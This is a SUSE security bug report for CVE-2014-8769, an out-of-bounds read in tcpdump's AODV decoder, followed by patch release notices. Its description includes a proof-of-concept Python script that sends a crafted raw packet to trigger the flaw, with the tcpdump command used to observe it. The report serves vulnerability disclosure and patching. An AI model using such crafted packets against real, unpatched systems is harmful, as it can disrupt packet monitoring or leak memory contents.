Bug 905872 (CVE-2014-8769) - VUL-1: CVE-2014-8769: tcpdump: unreliable output using malformed AOVD payload
Summary: VUL-1: CVE-2014-8769: tcpdump: unreliable output using malformed AOVD payload
Status: RESOLVED FIXED
Alias: CVE-2014-8769
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Minor
Target Milestone: ---
Deadline: 2014-12-16
Assignee: Security Team bot
QA Contact: Security Team bot
URL:
Whiteboard: maint:released:sle11-sp1:59704 maint:...
Keywords:
Depends on:
Blocks:
 
Reported: 2014-11-18 08:37 UTC by Johannes Segitz
Modified: 2017-05-08 16:13 UTC (History)
2 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2014-11-18 08:37:27 UTC 
CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload

1. Background

tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.

2. Summary Information

It was found out that malformed network traffic (AOVD-based) can lead
to an abnormal behaviour if verbose output of tcpdump monitoring the
network is used.

3. Technical Description

The application decoder for the Ad hoc On-Demand Distance Vector
(AODV) protocol fails to perform input validation and performs unsafe
out-of-bound accesses. The application will usually not crash, but
perform out-of-bounds accesses and output/leak larger amounts of
invalid data, which might lead to dropped packets. It is unknown if
other payload exists that might trigger segfaults.

To reproduce start tcpdump on a network interface

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a possible segfault message
on certain environments, see dmesg for details)

and use the following python program to generate a frame on the
network (might also need sudo):

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

aovd_frame =
"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x
1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"

s.send(aovd_frame)

4. Affected versions

Affected versions are 3.8 through 4.6.2

5. Fix

The problem is fixed in the upcoming version tcpdump 4.7.0

6. Advisory Timeline

2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory

7. Credit

The issue was found by

Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

using a slightly enhanced version of american fuzzy lop
(https://code.google.com/p/american-fuzzy-lop/) created by Michal
Zalewski.

SLES 10, 11, 12 and all openSUSE are affected
Comment 1 Swamp Workflow Management 2014-11-18 10:32:44 UTC 
An update workflow for this issue was started.
This issue was rated as low.
Please submit fixed packages until 2014-12-16.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/59702
Comment 2 Swamp Workflow Management 2014-11-18 23:00:32 UTC 
bugbot adjusting priority
Comment 5 Swamp Workflow Management 2014-12-23 18:06:15 UTC 
SUSE-SU-2014:1692-1: An update that fixes two vulnerabilities is now available.

Category: security (low)
Bug References: 905870,905872
CVE References: CVE-2014-8767,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Server 11 SP3 (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Desktop 11 SP3 (src):    tcpdump-3.9.8-1.23.1
Comment 6 Swamp Workflow Management 2014-12-29 10:05:24 UTC 
SUSE-SU-2014:1723-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 12 (src):    tcpdump-4.5.1-4.1
SUSE Linux Enterprise Desktop 12 (src):    tcpdump-4.5.1-4.1
Comment 8 Bernhard Wiedemann 2015-02-06 13:00:14 UTC 
This is an autogenerated message for OBS integration:
This bug (905872) was mentioned in
https://build.opensuse.org/request/show/284471 13.2+13.1 / tcpdump
Comment 9 Swamp Workflow Management 2015-02-13 15:05:14 UTC 
openSUSE-SU-2015:0284-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
openSUSE 13.2 (src):    tcpdump-4.6.2-4.1
openSUSE 13.1 (src):    tcpdump-4.4.0-2.4.1
Comment 10 Victor Pereira 2015-02-13 20:35:35 UTC 
released
Comment 11 Swamp Workflow Management 2017-04-26 19:09:36 UTC 
SUSE-SU-2017:1110-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
Comment 12 Swamp Workflow Management 2017-05-08 16:13:08 UTC 
openSUSE-SU-2017:1199-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
openSUSE Leap 42.2 (src):    libpcap-1.8.1-7.3.1, tcpdump-4.9.0-6.3.1
openSUSE Leap 42.1 (src):    libpcap-1.8.1-8.1, tcpdump-4.9.0-7.1